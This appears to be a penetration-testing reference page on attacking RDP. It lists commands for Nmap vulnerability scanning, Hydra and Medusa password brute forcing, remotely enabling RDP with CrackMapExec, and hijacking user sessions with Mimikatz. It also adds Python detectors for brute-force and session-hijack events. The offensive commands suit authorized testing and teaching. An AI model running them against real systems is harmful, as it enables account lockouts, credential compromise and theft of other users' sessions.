# Port 3389 | RDP

## Enumeration

### Nmap

```bash
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 <IP>
```

## Bruteforce

Brute forcing can easily lock user accounts. If possible, enumerate the domain password policy before proceeding.

### Hydra

```bash
hydra -L <User/s.txt> -P <Password/s.txt> rdp://<IP>
```

### Medusa

```bash
medusa -t 4 -h <IP> -u <User> -P <Password/s.txt> -M rdp
```
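A defender-side check for the lockout risk described above: count RDP (logon type 10) failures from Windows event 4625 per source address and per target account. This is an added example, not part of the original page or of Hydra/Medusa; it runs over constructed, simplified event lines in an assumed `key=value` layout rather than real EVTX exports, and the lockout threshold of 5 is an assumed value to be replaced by the domain's actual policy.

```python
"""Detect RDP brute forcing and lockout exposure from Windows 4625 events.

Added example; the 'timestamp key=value ...' line layout is an assumption
made for this demo (constructed sample below), not a real log format.
Logon type 10 is RemoteInteractive, i.e. RDP."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: six failures from 10.0.0.50 in under a minute against
# two accounts, one lone failure from another host, one non-RDP failure.
SAMPLE_EVENTS = [
    "2024-05-01T10:00:01 EventID=4625 LogonType=10 TargetUserName=alice IpAddress=10.0.0.50",
    "2024-05-01T10:00:03 EventID=4625 LogonType=10 TargetUserName=alice IpAddress=10.0.0.50",
    "2024-05-01T10:00:05 EventID=4625 LogonType=10 TargetUserName=alice IpAddress=10.0.0.50",
    "2024-05-01T10:00:08 EventID=4625 LogonType=10 TargetUserName=bob IpAddress=10.0.0.50",
    "2024-05-01T10:00:12 EventID=4625 LogonType=10 TargetUserName=bob IpAddress=10.0.0.50",
    "2024-05-01T10:00:20 EventID=4625 LogonType=10 TargetUserName=alice IpAddress=10.0.0.50",
    "2024-05-01T10:05:00 EventID=4625 LogonType=10 TargetUserName=carol IpAddress=10.0.0.77",
    "2024-05-01T10:06:00 EventID=4625 LogonType=3 TargetUserName=dave IpAddress=10.0.0.90",
]


def parse_event(line):
    """Split 'timestamp key=value ...' into a dict; the timestamp lands in 'ts'."""
    ts, _, rest = line.partition(" ")
    fields = dict(tok.split("=", 1) for tok in rest.split())
    fields["ts"] = datetime.fromisoformat(ts)
    return fields


def rdp_failures(lines):
    """Keep only failed RDP logons (event 4625, logon type 10), oldest first."""
    events = [ev for ev in map(parse_event, lines)
              if ev.get("EventID") == "4625" and ev.get("LogonType") == "10"]
    return sorted(events, key=lambda e: e["ts"])


def detect_rdp_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: {'failures': n, 'accounts': [...]}} for every source
    that produced at least `threshold` RDP failures inside one sliding window."""
    by_source = defaultdict(list)
    for ev in rdp_failures(lines):
        by_source[ev["IpAddress"]].append(ev)
    alerts = {}
    for ip, events in by_source.items():
        start = 0
        for end in range(len(events)):
            # Advance the window start until it spans at most `window`.
            while events[end]["ts"] - events[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = {
                    "failures": len(events),
                    "accounts": sorted({e["TargetUserName"] for e in events}),
                }
                break
    return alerts


def lockout_risk(lines, lockout_threshold=5):
    """Accounts whose RDP failure count has reached the lockout threshold.
    The default of 5 is assumed; use the real domain policy value."""
    counts = defaultdict(int)
    for ev in rdp_failures(lines):
        counts[ev["TargetUserName"]] += 1
    return sorted(user for user, n in counts.items() if n >= lockout_threshold)


if __name__ == "__main__":
    print(detect_rdp_bruteforce(SAMPLE_EVENTS))
    print(lockout_risk(SAMPLE_EVENTS, lockout_threshold=3))
```

With the sample data the single noisy source trips the sliding-window rule, while no account reaches a lockout threshold of 5; lowering the threshold to 3 shows `alice` would already be locked out under a stricter policy.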

## Connecting

### Crackmapexec

Requires administrative privileges; enables RDP on the target host.

```bash
crackmapexec smb '<IP>' -u '<User>' -p '<Password>' -M rdp -o ACTION=enable # Enable RDP
```

### rdesktop

```bash
rdesktop -u <Username> <IP>
rdesktop -d <Domain> -u <Username> -p <Password> <IP>
```

### xfreerdp

```bash
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>'
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard

# Maps the specified folder on the attacking machine to the RDP host
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
```

## **Hijacking**

This method is not stealthy and will disconnect a user's active terminal services session. However, you can also connect to a disconnected session, which can be stealthier.

This method also requires privileges as SYSTEM on the terminal server host.

### **Mimikatz**

```powershell
Invoke-Mimikatz -Command '"ts::sessions"'
```

![](/files/cjsocd31Cav3bdv5MNW5)

Connect to the terminal services session.

```powershell
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'
```
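A detection for the behaviour this section describes: an active session being torn down and then reattached moments later from a different client. This is an added example, not part of the original page or of Mimikatz; it runs over constructed, simplified event lines in an assumed `key=value` layout built from the fields of Windows events 4779 (session disconnected) and 4778 (session reconnected), and the 30-second pairing window is an assumed tuning value.

```python
"""Flag RDP session reconnects that match the hijack pattern: a 4779
disconnect followed within seconds by a 4778 reconnect of the same logon
session from a different client name or address.

Added example; the 'timestamp key=value ...' layout is an assumption made
for this demo (constructed sample below), not a real log format."""
from datetime import datetime, timedelta

# Constructed sample: alice's session is dropped and reattached two seconds
# later from a different client (the terminal server itself); bob's session
# drops and reconnects from the same laptop 40 seconds later (network blip).
SAMPLE_EVENTS = [
    "2024-05-01T11:00:00 EventID=4778 AccountName=alice LogonID=0x3e7a1 SessionName=RDP-Tcp#4 ClientName=ALICE-PC ClientAddress=10.0.0.20",
    "2024-05-01T11:30:00 EventID=4779 AccountName=alice LogonID=0x3e7a1 SessionName=RDP-Tcp#4 ClientName=ALICE-PC ClientAddress=10.0.0.20",
    "2024-05-01T11:30:02 EventID=4778 AccountName=alice LogonID=0x3e7a1 SessionName=RDP-Tcp#4 ClientName=TS01 ClientAddress=10.0.0.5",
    "2024-05-01T12:00:00 EventID=4779 AccountName=bob LogonID=0x41b22 SessionName=RDP-Tcp#5 ClientName=BOB-LAPTOP ClientAddress=10.0.0.31",
    "2024-05-01T12:00:40 EventID=4778 AccountName=bob LogonID=0x41b22 SessionName=RDP-Tcp#5 ClientName=BOB-LAPTOP ClientAddress=10.0.0.31",
]


def parse_event(line):
    """Split 'timestamp key=value ...' into a dict; the timestamp lands in 'ts'."""
    ts, _, rest = line.partition(" ")
    fields = dict(tok.split("=", 1) for tok in rest.split())
    fields["ts"] = datetime.fromisoformat(ts)
    return fields


def detect_session_hijack(lines, window=timedelta(seconds=30)):
    """Return one alert per 4778 that reattaches a logon session within
    `window` of its 4779 disconnect from a client that differs from the
    one that was disconnected. Same-client reconnects are treated as benign."""
    events = sorted(map(parse_event, lines), key=lambda e: e["ts"])
    last_disconnect = {}   # LogonID -> most recent 4779 for that session
    alerts = []
    for ev in events:
        key = ev.get("LogonID")
        if ev.get("EventID") == "4779":
            last_disconnect[key] = ev
        elif ev.get("EventID") == "4778":
            prev = last_disconnect.pop(key, None)
            if prev is None:
                continue   # first attach of the session, nothing to compare
            old_client = (prev["ClientName"], prev["ClientAddress"])
            new_client = (ev["ClientName"], ev["ClientAddress"])
            if ev["ts"] - prev["ts"] <= window and old_client != new_client:
                alerts.append({
                    "account": ev["AccountName"],
                    "session": ev["SessionName"],
                    "old_client": old_client,
                    "new_client": new_client,
                    "seconds": (ev["ts"] - prev["ts"]).total_seconds(),
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_session_hijack(SAMPLE_EVENTS):
        print(alert)
```

Pairing on the logon ID rather than the account name keeps a user's own reconnect from a second machine from colliding with another session of theirs; the window and the "different client" test together separate the pattern from ordinary reconnects after a dropped connection.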

## **Man-in-the-Middle**

[SETH](https://github.com/SySS-Research/Seth) can be used to perform Man-in-the-Middle attacks over RDP.

{% content-ref url="/pages/-MiMLbfyQD9eqo6ri-Kn" %}
[RDP MiTM](/pentest-everything/everything/everything-active-directory/adversary-in-the-middle/rdp-mitm.md)
{% endcontent-ref %}

